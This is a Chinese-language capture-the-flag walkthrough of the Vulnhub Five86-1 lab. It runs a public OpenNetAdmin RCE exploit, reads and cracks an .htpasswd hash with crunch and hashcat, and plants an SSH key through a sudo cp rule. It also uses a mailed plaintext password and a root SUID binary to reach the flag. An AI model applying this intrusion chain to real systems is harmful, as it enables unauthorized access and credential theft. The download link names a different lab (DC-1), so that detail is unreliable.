Vulnhub通关手册——04 Five86-1
背景概述:
下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/
本次靶机IP为
100.10.10.133
,将该IP地址添加到hosts文件中,映射到域名five86.local
技术要点:
- opennetadmin漏洞利用
-
find / -type f -user 用户名
查看该用户名可以读取的文件 - 使用
hash-identifier
查看加密方式 - 使用
crunch
生成字典 - 使用
hashcat
工具进行密码破解
1. 信息收集
1.1 扫描目标主机IP
使用arp-scan -l
命令进行局域网内部存货主机的扫描。
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1 00:50:56:c0:00:08 VMware, Inc.
100.10.10.133 00:0c:29:c3:7a:e0 VMware, Inc.
100.10.10.253 00:50:56:fd:dd:e0 VMware, Inc.
100.10.10.254 00:50:56:e1:62:61 VMware, Inc.
根据MAC地址对比,得知目标主机IP为100.10.10.133
。
1.2 扫描目标主机开放端口
使用命令nmap -sS -Pn -p 1-65535 100.10.10.133
进行目标主机开放端口的检测。
└─# nmap -sS -Pn -p 1-65535 100.10.10.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 09:05 CST
Stats: 0:00:07 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 100.10.10.133
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:C3:7A:E0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
根据扫描结果得知目标主机开放端口有22、80、10000。
1.3 目录扫描
使用命令dirb http://five86.local
进行目录扫描。
└─# dirb http://five86.local
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 29 16:00:23 2021
URL_BASE: http://five86.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://five86.local/ ----
+ http://five86.local/index.html (CODE:200|SIZE:30)
+ http://five86.local/reports (CODE:401|SIZE:459)
+ http://five86.local/robots.txt (CODE:200|SIZE:29)
+ http://five86.local/server-status (CODE:403|SIZE:277)
-----------------
END_TIME: Wed Dec 29 16:00:30 2021
DOWNLOADED: 4612 - FOUND: 4
根据扫描结果可知,存在以上目录。
2. Web站点检测
2.1 getShell
登录网站http://five86.local
,发现没有任何内容。打开http://five86.local/robots.txt
,显示内容如下。
User-agent: *
Disallow: /ona
由此猜测存在隐藏目录http://five86.local/ona
,打开该网页,发现是opennetadmin的管理页面,并且版本为18.1.1
。
网上收集相关信息,发现该版本存在RCE漏洞。exp下载如下。
https://github.com/amriunix/ona-rce
使用命令cat ona-rce.py
查看使用该exp需要什么参数。
print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
使用命令python3 ona-rce.py exploit http://five86.local/ona/
,获取目标主机的shell。
└─# python3 ona-rce.py exploit http://five86.local/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$
2.2 破解密码
经一番测试,无法正常执行的命令无法进行回显,例如不能执行cd
命令。尝试其他命令。
sh$ uname -a
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ whoami
www-data
使用命令find / -type f -user www-data
查看这个用户可以读取的文件。
……
/var/www/html/reports/.htaccess
find: '/var/log/private': Permission denied
find: '/var/log/apache2': Permission denied
find: '/var/log/mysql': Permission denied
find: '/var/log/exim4': Permission denied
/var/log/ona.log
……
可以访问的目录文件有/var/www/html/reports/.htaccess
和/var/log/ona.log
。
访问/var/www/html/reports/.htaccess
文件,查看内容。
sh$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
发现一个隐藏路径/var/www/.htpasswd
,访问该文件。
sh$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
得到用户名douglas
和经加密后的密码$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
,提示内容为包含aefhrt的10个字符。
使用hash-identifier
查看是何种加密方式。
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
Possible Hashs:
[+] MD5(APR)
--------------------------------------------------
可知使用的是MD5(ARP)
加密方式。
使用crunch生成对应的字典文件pass.txt
,命令为crunch 10 10 aefhrt -o pass.txt
。
└─# crunch 10 10 aefhrt -o pass.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
crunch: 21% completed generating output
crunch: 46% completed generating output
crunch: 60% completed generating output
crunch: 81% completed generating output
crunch: 100% completed generating output
使用hashcat
工具进行加密密码的破解。命令为hashcat -m 1600 -a 0 -o res hash.txt pass.txt
。
在kali上运行时,会报错,这里在wls中运行。
最终密码为fatherrrrr
。
2.3 SSH远程登录
2.3.1 douglas用户
使用命令ssh douglas@100.10.10.133
进行远程连接。
└─# ssh douglas@100.10.10.133
douglas@100.10.10.133's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 28 21:26:43 2021 from 100.10.10.129
douglas@five86-1:~$
这里是个TTY,但依旧存在权限限制,使用sudo -l
命令查看可以使用哪些命令。
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
结果有jen用户的cp
命令。
如果jen用户下的/home/jen/.ssh/authorized_keys
包含douglas
的公钥,那就可以用douglas
的id_rsa
文件登陆jen
的ssh,也即免密登陆jen
的ssh。这里复制到/tmp
目录下是因为jen
没有权限访问douglas
目录下的文件。
使用命令如下。
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
2.3.2 jen用户
使用ssh进行jen用户的登录,命令为ssh -i id_rsa jen@127.0.0.1
。
douglas@five86-1:~$ ssh -i id_rsa jen@127.0.0.1
Warning: Identity file id_rsa not accessible: No such file or directory.
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Tue Dec 28 21:36:24 2021 from 127.0.0.1
jen@five86-1:~$
使用命令find / -type f -user jen
查看当前用户可以读取的文件。
……
/var/mail/jen
……
查看该文件。
jen@five86-1:~$ cat /var/mail/jen
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
通过该邮件可知用户名moss
和密码Fire!Fire!
。
2.3.3 moss用户
使用命令ssh moss@127.0.0.1
登录。
jen@five86-1:~$ ssh moss@127.0.0.1
moss@127.0.0.1's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 28 21:43:08 2021 from 127.0.0.1
moss@five86-1:~$
使用ls -la
命令查看当前文件夹所有文件。
moss@five86-1:~$ ls -al
total 12
drwx------ 3 moss moss 4096 Jan 1 2020 .
drwxr-xr-x 7 root root 4096 Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 9 Jan 1 2020 .bash_history -> /dev/null
drwx------ 2 moss moss 4096 Jan 1 2020 .games
发现一个隐藏文件夹.games
。
进入该文件夹,再次查看所有文件。发现存在一个root权限的二进制文件upyourgame
。
运行这个文件后,神奇的变成了root权限。
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? yes
Could you please repeat that? yes
Nope, you'll need to enter that again. yes
You entered: No. Is this correct? no
We appear to have a problem? Do we have a problem? no
Made in Britain.
# whoami
root
# id
uid=0(root) gid=1001(moss) groups=1001(moss)
# cd /root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
顺利拿到flag!